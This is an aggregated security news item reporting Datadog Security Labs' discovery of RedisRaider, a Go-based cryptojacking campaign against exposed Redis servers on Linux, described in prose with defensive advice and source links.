CyberSecurity news
FlagThis
Aminu Abdullahi@eSecurity Planet
//
Cybersecurity researchers are raising alarms about a new, sophisticated cryptojacking campaign called RedisRaider, which targets publicly accessible Redis servers running on Linux. Discovered by Datadog Security Labs, RedisRaider employs an aggressive and technically complex attack chain to deploy Monero miners on compromised systems. The malware uses a custom-built scanner to identify vulnerable Redis servers across the internet, exploiting weak configurations to execute malicious cron jobs that download and run the primary payload.
The attackers behind RedisRaider have implemented advanced techniques to evade detection and analysis. The malware is written in Go and heavily obfuscated using a tool called Garble, hiding key functions within the code. Additionally, RedisRaider employs anti-forensic measures such as short key time-to-live (TTL) settings to erase traces, writing temporary files to cron directories to blend with system processes, and deleting keys and logs after execution to cover its tracks. These tactics make it challenging for security professionals to detect and analyze the malicious activity.
Datadog's investigation uncovered that the same infrastructure used for the server-level attacks also hosted a web-based Monero miner, indicating a multi-pronged revenue generation strategy. The attackers generate income not only from hijacked Linux servers but also from unsuspecting website visitors. Experts emphasize the need for proper configuration and security measures for publicly accessible Redis servers, including strong authentication and access controls, to prevent RedisRaider and similar cryptojacking campaigns from compromising systems and stealing resources.
ImgSrc: assets.esecurit
References :
The attackers behind RedisRaider have implemented advanced techniques to evade detection and analysis. The malware is written in Go and heavily obfuscated using a tool called Garble, hiding key functions within the code. Additionally, RedisRaider employs anti-forensic measures such as short key time-to-live (TTL) settings to erase traces, writing temporary files to cron directories to blend with system processes, and deleting keys and logs after execution to cover its tracks. These tactics make it challenging for security professionals to detect and analyze the malicious activity.
Datadog's investigation uncovered that the same infrastructure used for the server-level attacks also hosted a web-based Monero miner, indicating a multi-pronged revenue generation strategy. The attackers generate income not only from hijacked Linux servers but also from unsuspecting website visitors. Experts emphasize the need for proper configuration and security measures for publicly accessible Redis servers, including strong authentication and access controls, to prevent RedisRaider and similar cryptojacking campaigns from compromising systems and stealing resources.
ImgSrc: assets.esecurit
Share:
References :
- cyberpress.org: A newly discovered cryptojacking campaign, dubbed RedisRaider, is targeting publicly accessible Redis servers on Linux systems with an aggressive and technically complex attack chain.
- thehackernews.com: Cybersecurity researchers are calling attention to a new Linux cryptojacking campaign that's targeting publicly accessible Redis servers.
- eSecurity Planet: New Go-Based Malware ‘RedisRaider’ Exploits Redis Servers to Mine Cryptocurrency
- Cyber Security News: New RedisRaider Campaign Attacking Linux Servers by Abusing Redis Configuration
- gbhackers.com: Datadog Security Research has uncovered a formidable new cryptojacking campaign dubbed “RedisRaider,” specifically targeting Linux servers with publicly accessible Redis instances.
- www.esecurityplanet.com: New Go-Based Malware ‘RedisRaider’ Exploits Redis Servers to Mine Cryptocurrency
Classification:
- HashTags: #Malware #Cryptojacking #RedisRaider
- Company: Redis
- Target: Linux Servers
- Attacker: Datadog Security Labs
- Product: Redis
- Feature: Misconfiguration Exploitation
- Malware: RedisRaider
- Type: Malware
- Severity: Medium